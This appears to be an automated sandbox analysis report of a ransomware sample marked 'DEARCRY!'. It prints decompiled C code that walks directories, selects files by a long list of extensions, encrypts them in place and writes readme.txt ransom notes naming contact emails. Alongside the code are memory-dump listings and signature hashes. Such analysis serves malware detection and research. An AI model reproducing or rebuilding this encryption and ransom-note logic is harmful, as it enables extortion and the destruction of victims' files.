                                                              0x00c6aa34
                                                              0x00c6aa37
                                                              0x00c6aa39
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6aa3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6aa41
                                                              0x00c6aa43
                                                              0x00c6aa45
                                                              0x00c6aa47
                                                              0x00c6aa47
                                                              0x00c6aa49
                                                              0x00c6aa4c
                                                              0x00c6ab1d
                                                              0x00c6ab1f
                                                              0x00c6ab23
                                                              0x00c6ab2c
                                                              0x00c6ab31
                                                              0x00c6ab31
                                                              0x00c6ab34
                                                              0x00c6ab39
                                                              0x00c6ab3a
                                                              0x00c6ab3b
                                                              0x00c6ab3c
                                                              0x00c6ab3d
                                                              0x00c6ab43
                                                              0x00000000
                                                              0x00c6aa52
                                                              0x00c6aa5b
                                                              0x00c6aa60
                                                              0x00c6aa63
                                                              0x00c6aa65
                                                              0x00c6aa68
                                                              0x00c6aa6a
                                                              0x00c6aa6d
                                                              0x00c6aa70
                                                              0x00c6aa70
                                                              0x00c6ab0d
                                                              0x00c6ab0d
                                                              0x00c6ab0d
                                                              0x00000000
                                                              0x00c6aa2b
                                                              0x00c6aa25
                                                              0x00c6a9f0
                                                              0x00c6a9d1
                                                              0x00c6a9d6
                                                              0x00c6a9d6
                                                              0x00c6a9d9
                                                              0x00c6a9dc
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6a9dc
                                                              0x00c6a9ab
                                                              0x00c6a9ab
                                                              0x00c6a9b0
                                                              0x00c6a9b1
                                                              0x00c6a9b2
                                                              0x00c6a9b3
                                                              0x00c6a9b4
                                                              0x00c6a9ba
                                                              0x00000000
                                                              0x00c6a9ba

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3886058894-0
                                                              • Opcode ID: f4a219d403e3402404f687f20ce666abf1e957fd9eb65b1326e34f0e223bcd6a
                                                              • Instruction ID: 73604558041a2a158d32349dde6c6bc171407461b1b23e007e1cbdcd038566a5
                                                              • Opcode Fuzzy Hash: f4a219d403e3402404f687f20ce666abf1e957fd9eb65b1326e34f0e223bcd6a
                                                              • Instruction Fuzzy Hash: 4051A631A00605EFCB309FAA89C499EBBB5EF81320F24866AF435B61D1D7709E51DF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B91A36, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00B91A36(void* __eax, char** __ebx, intOrPtr* __esi) {
				int _t89;
				intOrPtr* _t90;
				char** _t91;
				intOrPtr* _t92;
				void* _t100;
				intOrPtr* _t101;
				char** _t103;
				char** _t104;
				char** _t109;
				char** _t110;
				intOrPtr* _t111;
				char** _t112;
				char* _t115;
				char** _t116;
				char _t119;
				intOrPtr* _t120;
				char** _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				char** _t130;
				char** _t132;
				intOrPtr* _t135;
				void* _t137;
				intOrPtr* _t138;
				intOrPtr* _t140;
				void* _t144;
				intOrPtr* _t149;
				char _t153;
				intOrPtr* _t154;
				intOrPtr _t158;
				intOrPtr _t165;
				char** _t166;
				char** _t168;
				char** _t169;
				char** _t171;
				char* _t172;
				char* _t173;
				char** _t174;
				char** _t176;
				char* _t178;
				char** _t179;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t184;
				void* _t186;
				void* _t187;
				char* _t191;
				char** _t194;
				char** _t195;
				void* _t198;
				void* _t199;
				void* _t200;
				char** _t201;
				signed int _t202;
				char** _t204;
				char** _t205;
				void* _t206;
				void* _t207;
				intOrPtr _t210;
				intOrPtr* _t211;
				intOrPtr _t212;
				signed int _t213;
				void* _t215;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t222;

				_t211 = __esi;
				_t157 = __ebx;
				while(1) {
					L49:
					_t168 =  *((intOrPtr*)(_t213 + _t100 - 0xf98));
					 *((char*)(_t213 + _t100 - 0x568)) = _t168;
					_t100 = _t100 + 1;
					__eflags = _t168;
					if(_t168 != 0) {
						continue;
					}
					L50:
					_t201 = 0;
					__eflags = 0;
					_t101 = _t213 - 0x568;
					_t185 = _t101 + 1;
					do {
						_t169 =  *_t101;
						_t101 = _t101 + 1;
						__eflags = _t169;
					} while (_t169 != 0);
					__eflags = _t101 != _t185;
					if(_t101 != _t185) {
						do {
							_t119 = E00C6AFFA( *((char*)(_t213 + _t201 - 0x568)));
							_t215 = _t215 + 4;
							 *((char*)(_t213 + _t201 - 0x568)) = _t119;
							_t201 =  &(_t201[0]);
							__eflags = _t201;
							_t120 = _t213 - 0x568;
							_t185 = _t120 + 1;
							do {
								_t176 =  *_t120;
								_t120 = _t120 + 1;
								__eflags = _t176;
							} while (_t176 != 0);
							__eflags = _t201 - _t120 - _t185;
						} while (_t201 < _t120 - _t185);
					}
					_t202 = 0;
					__eflags =  *0xec9fb0;
					if( *0xec9fb0 != 0) {
						_t115 = 0xec9fb0;
						while(1) {
							_t185 = _t213 - 0x568;
							_t116 = E00C6A360(_t213 - 0x568, _t115);
							_t215 = _t215 + 8;
							__eflags = _t116;
							if(_t116 != 0) {
								break;
							}
							_t202 = _t202 + 1;
							_t115 = 0xec9fb0 + _t202 * 0xff;
							__eflags =  *_t115;
							if( *_t115 != 0) {
								continue;
							} else {
							}
							goto L63;
						}
						 *((char*)(_t213 - 0x15f1)) = 0;
					}
					L63:
					_t204 = _t213 - 0xf97;
					__eflags = _t204;
					do {
						_t103 = _t204[0];
						_t204 =  &(_t204[0]);
						__eflags = _t103;
					} while (_t103 != 0);
					_t160 = "\\"; // 0x5c
					 *_t204 = _t160;
					__eflags =  *((intOrPtr*)(_t213 - 0x15f1)) - _t103;
					if( *((intOrPtr*)(_t213 - 0x15f1)) != _t103) {
						_t104 = E00C6A360(_t213 - 0x568, "DESKTOP");
						_t219 = _t215 + 8;
						__eflags = _t104;
						if(_t104 != 0) {
							_t109 = _t213 - 0x567;
							__eflags = _t109;
							do {
								_t171 = _t109[0];
								_t109 =  &(_t109[0]);
								__eflags = _t171;
							} while (_t171 != 0);
							_t172 = "/readme.txt"; // 0x6165722f
							 *_t109 = _t172;
							_t191 = M00CBF7C8; // 0x2e656d64
							_t109[1] = _t191;
							_t173 =  *0xcbf7cc; // 0x747874
							_t109[2] = _t173;
							_t110 = L00C6A96D(_t213 - 0x568, "w+"); // executed
							_t219 = _t219 + 8;
							_t205 = _t110;
							__eflags = _t205;
							if(_t205 != 0) {
								_t111 = 0xdc9fb0;
								do {
									_t174 =  *_t111;
									_t111 = _t111 + 1;
									__eflags = _t174;
								} while (_t174 != 0);
								_t112 = _t111 - 0xdc9fb1;
								__eflags = _t112;
								_push(_t205);
								_push(_t112);
								_push(1);
								_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
								E00C6ADA3(_t157, 0xdc9fb1, _t205, _t211, __eflags);
								_push(_t205); // executed
								E00C6B1A7(_t157, 0xdc9fb1, _t205, _t211, __eflags); // executed
								_t219 = _t219 + 0x14;
							}
						}
						_t160 = _t213 - 0xf98;
						_t185 =  *(_t213 - 0x1600);
						E00B91640( *(_t213 - 0x1600), _t213 - 0xf98,  *(_t213 + 0x10),  *((intOrPtr*)(_t213 + 0x14)),  *((intOrPtr*)(_t213 - 0x15f8)),  *((intOrPtr*)(_t213 - 0x15fc))); // executed
						_t215 = _t219 + 0x18;
					}
					 *((char*)(_t213 - 0x15f1)) = 1;
					while(1) {
						L75:
						_t199 =  *(_t213 - 0x1608);
						_t89 = FindNextFileA(_t199, _t213 - 0x15f0); // executed
						if(_t89 == 0) {
							break;
						}
						if(( *(_t213 - 0x15f0) & 0x00000010) != 0) {
							__eflags =  *(_t213 - 0x15c4) - 0x2e;
							if( *(_t213 - 0x15c4) != 0x2e) {
								_t90 = _t211;
								_t187 = _t90 + 1;
								do {
									_t166 =  *_t90;
									_t90 = _t90 + 1;
									__eflags = _t166;
								} while (_t166 != 0);
								_t91 = _t90 - _t187;
								__eflags = _t91;
								_t185 = _t91;
								_t92 = _t213 - 0x15c4;
								_t46 = _t92 + 1; // 0x2f
								_t200 = _t46;
								do {
									_t160 =  *_t92;
									_t92 = _t92 + 1;
									__eflags = _t160;
								} while (_t160 != 0);
								__eflags = _t92 - _t200 + _t185 - 0x514;
								if(_t92 - _t200 + _t185 < 0x514) {
									E00C6BB40(_t200, _t213 - 0xf98, 0, 0x514);
									E00C6BB40(_t200, _t213 - 0x568, 0, 0x514);
									_push(_t213 - 0x15c4);
									E00C69C35(_t200, _t211, _t213 - 0xf98, "%s%s", _t211);
									_t215 = _t215 + 0x28;
									_t100 = 0;
									do {
										goto L49;
									} while (_t168 != 0);
									goto L50;
								}
							}
						} else {
							_t123 = E00C6AE30(_t160, _t213 - 0x15c4, 0x2e);
							_t215 = _t215 + 8;
							_t157 = _t123;
							if(_t157 != 0) {
								_t124 = _t211;
								_t186 = _t124 + 1;
								do {
									_t165 =  *_t124;
									_t124 = _t124 + 1;
								} while (_t165 != 0);
								_t185 = _t124 - _t186;
								_t126 = _t213 - 0x15c4;
								_t206 = _t126 + 1;
								do {
									_t160 =  *_t126;
									_t126 = _t126 + 1;
								} while (_t160 != 0);
								if(_t126 - _t206 + _t185 < 0x514) {
									E00C6BB40(_t206, _t213 - 0x50, 0, 0x32);
									_t220 = _t215 + 0xc;
									_t130 = _t157;
									_t9 =  &(_t130[0]); // 0x1
									_t194 = _t9;
									do {
										_t178 =  *_t130;
										_t130 =  &(_t130[0]);
									} while (_t178 != 0);
									if(_t130 - _t194 <= 0x32) {
										_t132 = _t157;
										_t10 =  &(_t132[0]); // 0x1
										_t195 = _t10;
										do {
											_t179 =  *_t132;
											_t132 =  &(_t132[0]);
											__eflags = _t179;
										} while (_t179 != 0);
										_t133 = _t132 - _t195;
										__eflags = _t132 - _t195;
									} else {
										_t133 = 0x32;
									}
									E00C6A6C0(_t213 - 0x50, _t157, _t133);
									_t221 = _t220 + 0xc;
									_t207 = 0;
									_t135 = _t213 - 0x50;
									_t185 = _t135 + 1;
									do {
										_t180 =  *_t135;
										_t135 = _t135 + 1;
									} while (_t180 != 0);
									if(_t135 != _t185) {
										do {
											_t153 = E00C6AFFA( *((char*)(_t213 + _t207 - 0x50)));
											_t221 = _t221 + 4;
											 *((char*)(_t213 + _t207 - 0x50)) = _t153;
											_t207 = _t207 + 1;
											_t154 = _t213 - 0x50;
											_t185 = _t154 + 1;
											do {
												_t184 =  *_t154;
												_t154 = _t154 + 1;
											} while (_t184 != 0);
										} while (_t207 < _t154 - _t185);
									}
									_t160 = _t213 - 0x50;
									_t137 = E00C6A360(".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA", _t213 - 0x50);
									_t215 = _t221 + 8;
									if(_t137 != 0) {
										_t160 = "readme.txt";
										_t138 = _t213 - 0x15c4;
										while(1) {
											_t185 =  *_t138;
											if(_t185 !=  *_t160) {
												break;
											}
											if(_t185 == 0) {
												L28:
												_t138 = 0;
											} else {
												_t185 =  *((intOrPtr*)(_t138 + 1));
												if(_t185 != _t160[1]) {
													break;
												} else {
													_t138 = _t138 + 2;
													_t160 =  &(_t160[2]);
													if(_t185 != 0) {
														continue;
													} else {
														goto L28;
													}
												}
											}
											L30:
											if(_t138 != 0) {
												E00C6BB40(_t207, _t213 - 0xa80, 0, 0x514);
												_t222 = _t215 + 0xc;
												_t140 = _t211;
												_t198 = _t140 + 1;
												do {
													_t181 =  *_t140;
													_t140 = _t140 + 1;
												} while (_t181 != 0);
												if( *((char*)(_t140 - _t198 + _t211 - 1)) == 0x5c) {
													L38:
													_t185 = _t213 - 0x15c4;
													_push(_t213 - 0x15c4);
													_push(_t211);
													_push("%s%s");
													_push(_t213 - 0xa80);
												} else {
													_t149 = _t211;
													_t185 = _t149 + 1;
													do {
														_t182 =  *_t149;
														_t149 = _t149 + 1;
													} while (_t182 != 0);
													if( *((char*)(_t149 - _t185 + _t211 - 1)) == 0x2f) {
														goto L38;
													} else {
														_push(_t213 - 0x15c4);
														_push(_t211);
														_push("%s\\%s");
														_push(_t213 - 0xa80);
													}
												}
												E00C69C35(_t207, _t211);
												 *((intOrPtr*)(_t213 - 4)) = 0;
												_t160 = _t213 - 0xa80;
												_t144 = L00C6A96D(_t213 - 0xa80, "rb+"); // executed
												_t215 = _t222 + 0x18;
												_t251 = _t144;
												if(_t144 != 0) {
													_push(_t144); // executed
													E00C6B1A7(_t157, _t185, _t207, _t211, _t251); // executed
													_t208 =  *((intOrPtr*)(_t213 - 0x15f8));
													E00C6BB40( *((intOrPtr*)(_t213 - 0x15f8)),  *((intOrPtr*)(_t213 - 0x15f8)), 0, 0x100000);
													E00C6BB40( *((intOrPtr*)(_t213 - 0x15f8)),  *((intOrPtr*)(_t213 - 0x15fc)), 0, 0x100000);
													_t185 =  *(_t213 + 0x10);
													_t157 =  *(_t213 - 0x1600);
													E00B915D0( *(_t213 - 0x1600), _t213 - 0xa80,  *(_t213 + 0x10), _t208,  *((intOrPtr*)(_t213 - 0x15fc)));
													_t215 = _t215 + 0x28;
												}
												 *((intOrPtr*)(_t213 - 4)) = 0xfffffffe;
											}
											goto L75;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										goto L30;
									}
								}
							}
						}
					}
					if(_t199 != 0xffffffff) {
						_t89 = FindClose(_t199); // executed
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t213 - 0x10));
					_pop(_t210);
					_pop(_t212);
					_pop(_t158);
					return E00C69C26(_t89, _t158,  *(_t213 - 0x1c) ^ _t213, _t185, _t210, _t212);
					L49:
					_t168 =  *((intOrPtr*)(_t213 + _t100 - 0xf98));
					 *((char*)(_t213 + _t100 - 0x568)) = _t168;
					_t100 = _t100 + 1;
					__eflags = _t168;
				}
			}







































































                                                              0x00b91a36
                                                              0x00b91a36
                                                              0x00b91a40
                                                              0x00b91a40
                                                              0x00b91a40
                                                              0x00b91a47
                                                              0x00b91a4e
                                                              0x00b91a4f
                                                              0x00b91a51
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91a53
                                                              0x00b91a53
                                                              0x00b91a53
                                                              0x00b91a55
                                                              0x00b91a5b
                                                              0x00b91a60
                                                              0x00b91a60
                                                              0x00b91a62
                                                              0x00b91a63
                                                              0x00b91a63
                                                              0x00b91a67
                                                              0x00b91a69
                                                              0x00b91a70
                                                              0x00b91a79
                                                              0x00b91a7e
                                                              0x00b91a81
                                                              0x00b91a88
                                                              0x00b91a88
                                                              0x00b91a89
                                                              0x00b91a8f
                                                              0x00b91a92
                                                              0x00b91a92
                                                              0x00b91a94
                                                              0x00b91a95
                                                              0x00b91a95
                                                              0x00b91a9b
                                                              0x00b91a9b
                                                              0x00b91a70
                                                              0x00b91a9f
                                                              0x00b91aa1
                                                              0x00b91aa8
                                                              0x00b91aaa
                                                              0x00b91ab0
                                                              0x00b91ab1
                                                              0x00b91ab8
                                                              0x00b91abd
                                                              0x00b91ac0
                                                              0x00b91ac2
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ac4
                                                              0x00b91acd
                                                              0x00b91ad3
                                                              0x00b91ad6
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ad8
                                                              0x00000000
                                                              0x00b91ad6
                                                              0x00b91ada
                                                              0x00b91ada
                                                              0x00b91ae1
                                                              0x00b91ae7
                                                              0x00b91ae7
                                                              0x00b91ae8
                                                              0x00b91ae8
                                                              0x00b91aeb
                                                              0x00b91aec
                                                              0x00b91aec
                                                              0x00b91af0
                                                              0x00b91af7
                                                              0x00b91afa
                                                              0x00b91b00
                                                              0x00b91b12
                                                              0x00b91b17
                                                              0x00b91b1a
                                                              0x00b91b1c
                                                              0x00b91b24
                                                              0x00b91b24
                                                              0x00b91b25
                                                              0x00b91b25
                                                              0x00b91b28
                                                              0x00b91b29
                                                              0x00b91b29
                                                              0x00b91b2d
                                                              0x00b91b33
                                                              0x00b91b35
                                                              0x00b91b3b
                                                              0x00b91b3e
                                                              0x00b91b44
                                                              0x00b91b53
                                                              0x00b91b58
                                                              0x00b91b5b
                                                              0x00b91b5d
                                                              0x00b91b5f
                                                              0x00b91b61
                                                              0x00b91b70
                                                              0x00b91b70
                                                              0x00b91b72
                                                              0x00b91b73
                                                              0x00b91b73
                                                              0x00b91b77
                                                              0x00b91b77
                                                              0x00b91b79
                                                              0x00b91b7a
                                                              0x00b91b7b
                                                              0x00b91b7d
                                                              0x00b91b82
                                                              0x00b91b87
                                                              0x00b91b88
                                                              0x00b91b8d
                                                              0x00b91b8d
                                                              0x00b91b5f
                                                              0x00b91ba6
                                                              0x00b91bad
                                                              0x00b91bb4
                                                              0x00b91bb9
                                                              0x00b91bb9
                                                              0x00b91bbc
                                                              0x00b91bc3
                                                              0x00b91bc3
                                                              0x00b91bca
                                                              0x00b91bd1
                                                              0x00b91bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9176d
                                                              0x00b919ac
                                                              0x00b919b3
                                                              0x00b919b9
                                                              0x00b919bb
                                                              0x00b919c0
                                                              0x00b919c0
                                                              0x00b919c2
                                                              0x00b919c3
                                                              0x00b919c3
                                                              0x00b919c7
                                                              0x00b919c7
                                                              0x00b919c9
                                                              0x00b919cb
                                                              0x00b919d1
                                                              0x00b919d1
                                                              0x00b919d4
                                                              0x00b919d4
                                                              0x00b919d6
                                                              0x00b919d7
                                                              0x00b919d7
                                                              0x00b919df
                                                              0x00b919e4
                                                              0x00b919f8
                                                              0x00b91a0e
                                                              0x00b91a1c
                                                              0x00b91a2a
                                                              0x00b91a2f
                                                              0x00b91a32
                                                              0x00b91a40
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91a40
                                                              0x00b919e4
                                                              0x00b91773
                                                              0x00b9177c
                                                              0x00b91781
                                                              0x00b91784
                                                              0x00b91788
                                                              0x00b9178e
                                                              0x00b91790
                                                              0x00b91793
                                                              0x00b91793
                                                              0x00b91795
                                                              0x00b91796
                                                              0x00b9179c
                                                              0x00b9179e
                                                              0x00b917a4
                                                              0x00b917a7
                                                              0x00b917a7
                                                              0x00b917a9
                                                              0x00b917aa
                                                              0x00b917b7
                                                              0x00b917c5
                                                              0x00b917ca
                                                              0x00b917cd
                                                              0x00b917cf
                                                              0x00b917cf
                                                              0x00b917d2
                                                              0x00b917d2
                                                              0x00b917d4
                                                              0x00b917d5
                                                              0x00b917de
                                                              0x00b917e7
                                                              0x00b917e9
                                                              0x00b917e9
                                                              0x00b917f0
                                                              0x00b917f0
                                                              0x00b917f2
                                                              0x00b917f3
                                                              0x00b917f3
                                                              0x00b917f7
                                                              0x00b917f7
                                                              0x00b917e0
                                                              0x00b917e0
                                                              0x00b917e0
                                                              0x00b917ff
                                                              0x00b91804
                                                              0x00b91807
                                                              0x00b91809
                                                              0x00b9180c
                                                              0x00b91810
                                                              0x00b91810
                                                              0x00b91812
                                                              0x00b91813
                                                              0x00b91819
                                                              0x00b91820
                                                              0x00b91826
                                                              0x00b9182b
                                                              0x00b9182e
                                                              0x00b91832
                                                              0x00b91833
                                                              0x00b91836
                                                              0x00b91840
                                                              0x00b91840
                                                              0x00b91842
                                                              0x00b91843
                                                              0x00b91849
                                                              0x00b91820
                                                              0x00b9184d
                                                              0x00b91856
                                                              0x00b9185b
                                                              0x00b91860
                                                              0x00b91866
                                                              0x00b9186b
                                                              0x00b91871
                                                              0x00b91871
                                                              0x00b91875
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91879
                                                              0x00b9188d
                                                              0x00b9188d
                                                              0x00b9187b
                                                              0x00b9187b
                                                              0x00b91881
                                                              0x00000000
                                                              0x00b91883
                                                              0x00b91883
                                                              0x00b91886
                                                              0x00b9188b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9188b
                                                              0x00b91881
                                                              0x00b91896
                                                              0x00b91898
                                                              0x00b918ac
                                                              0x00b918b1
                                                              0x00b918b4
                                                              0x00b918b6
                                                              0x00b918c0
                                                              0x00b918c0
                                                              0x00b918c2
                                                              0x00b918c3
                                                              0x00b918ce
                                                              0x00b918fb
                                                              0x00b918fb
                                                              0x00b91901
                                                              0x00b91902
                                                              0x00b91903
                                                              0x00b9190e
                                                              0x00b918d0
                                                              0x00b918d0
                                                              0x00b918d2
                                                              0x00b918d5
                                                              0x00b918d5
                                                              0x00b918d7
                                                              0x00b918d8
                                                              0x00b918e3
                                                              0x00000000
                                                              0x00b918e5
                                                              0x00b918eb
                                                              0x00b918ec
                                                              0x00b918ed
                                                              0x00b918f8
                                                              0x00b918f8
                                                              0x00b918e3
                                                              0x00b9190f
                                                              0x00b91917
                                                              0x00b91923
                                                              0x00b9192a
                                                              0x00b9192f
                                                              0x00b91932
                                                              0x00b91934
                                                              0x00b91936
                                                              0x00b91937
                                                              0x00b91946
                                                              0x00b9194d
                                                              0x00b91963
                                                              0x00b9196d
                                                              0x00b91977
                                                              0x00b9197d
                                                              0x00b91982
                                                              0x00b91982
                                                              0x00b91985
                                                              0x00b91985
                                                              0x00000000
                                                              0x00b91898
                                                              0x00b91891
                                                              0x00b91893
                                                              0x00000000
                                                              0x00b91893
                                                              0x00b91860
                                                              0x00b917b7
                                                              0x00b91788
                                                              0x00b9176d
                                                              0x00b91be2
                                                              0x00b91be5
                                                              0x00b91be5
                                                              0x00b91bee
                                                              0x00b91bf6
                                                              0x00b91bf7
                                                              0x00b91bf8
                                                              0x00b91c06
                                                              0x00b91a40
                                                              0x00b91a40
                                                              0x00b91a47
                                                              0x00b91a4e
                                                              0x00b91a4f
                                                              0x00b91a4f

                                                              Strings
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a, xrefs: 00B91B61, 00B91B7A, 00B91B7D
                                                              • /readme.txt, xrefs: 00B91B2D
                                                              • DESKTOP, xrefs: 00B91B06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /readme.txt$DESKTOP$Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a
                                                              • API String ID: 0-1364712149
                                                              • Opcode ID: 78b6c21cae9e91cf0aaf074b6f8f5505da5ba276f1fd87313cce715f85137d56
                                                              • Instruction ID: 72fa04c56e7dea4c50291cf7d448685dff0c3eb383c0770aded2283b19c40b89
                                                              • Opcode Fuzzy Hash: 78b6c21cae9e91cf0aaf074b6f8f5505da5ba276f1fd87313cce715f85137d56
                                                              • Instruction Fuzzy Hash: 235122719006478BCF20CF18DC94BFAB7F9EB85340F1846F8E81997252EA319D86DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B910C0, Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00B910C0(intOrPtr __ebx, char __esi, void* __ebp) {
				signed int _v4;
				char _v260;
				char _v516;
				char _v524;
				char _v528;
				void* _v532;
				void* __edi;
				signed int _t16;
				void* _t19;
				void* _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t29;
				intOrPtr _t30;
				void* _t33;
				signed int _t38;
				char _t39;
				signed int _t41;
				void* _t42;
				signed int _t54;

				_t39 = __esi;
				_t30 = __ebx;
				_t41 =  &_v532;
				_t16 =  *0xcc5970; // 0x851ab4dd
				_v4 = _t16 ^ _t41;
				_t38 = 0; // executed
				_t19 = E00C6AC24( &_v516, 1, 8, __esi); // executed
				_t42 = _t41 + 0x10;
				if(_t19 != 8) {
					L11:
					E00C6B1A7(_t30, _t37, _t38, _t39, _t54); // executed
					return E00C69C26(_t38, _t30, _v4 ^ _t42 + 0x00000004, _t37, _t38, _t39, _t39);
				} else {
					_t33 = 0;
					while(1) {
						_t37 =  *((intOrPtr*)(_t42 + _t33 + 0x14));
						_t5 = _t33 + "DEARCRY!"; // 0x52414544
						if( *((intOrPtr*)(_t42 + _t33 + 0x14)) !=  *_t5) {
							goto L11;
						}
						_t19 = _t19 - 4;
						_t33 = _t33 + 4;
						if(_t19 >= 4) {
							continue;
						}
						_t24 = E00C6AC24( &_v532, 1, 4, _t39);
						_t42 = _t42 + 0x10;
						if(_t24 == 4 && _v532 == 0x100) {
							_t25 = E00C6AC24( &_v260, 1, 0x100, _t39);
							_t42 = _t42 + 0x10;
							if(_t25 == _v532) {
								_t37 =  &_v528;
								_t26 = E00C6AC24( &_v528, 1, 4, _t39);
								_t42 = _t42 + 0x10;
								if(_t26 == 4) {
									_t27 = _v528;
									if(_t27 == 3 || _t27 == 4) {
										_t29 = E00C6AC24( &_v524, 1, 8, _t39);
										_t42 = _t42 + 0x10;
										_t14 = _t29 == 8;
										_t54 = _t14;
										_t38 = 0 | _t14;
									}
								}
							}
						}
						goto L11;
					}
					goto L11;
				}
			}
























                                                              0x00b910c0
                                                              0x00b910c0
                                                              0x00b910c0
                                                              0x00b910c6
                                                              0x00b910cd
                                                              0x00b910df
                                                              0x00b910e1
                                                              0x00b910e6
                                                              0x00b910ec
                                                              0x00b9119b
                                                              0x00b9119c
                                                              0x00b911bb
                                                              0x00b910f2
                                                              0x00b910f2
                                                              0x00b91100
                                                              0x00b91100
                                                              0x00b91104
                                                              0x00b9110a
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91110
                                                              0x00b91113
                                                              0x00b91119
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91125
                                                              0x00b9112a
                                                              0x00b91130
                                                              0x00b9114c
                                                              0x00b91151
                                                              0x00b91158
                                                              0x00b9115d
                                                              0x00b91164
                                                              0x00b91169
                                                              0x00b9116f
                                                              0x00b91171
                                                              0x00b91178
                                                              0x00b91189
                                                              0x00b91190
                                                              0x00b91196
                                                              0x00b91196
                                                              0x00b91199
                                                              0x00b91199
                                                              0x00b91178
                                                              0x00b9116f
                                                              0x00b91158
                                                              0x00000000
                                                              0x00b91130
                                                              0x00000000
                                                              0x00b91100

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
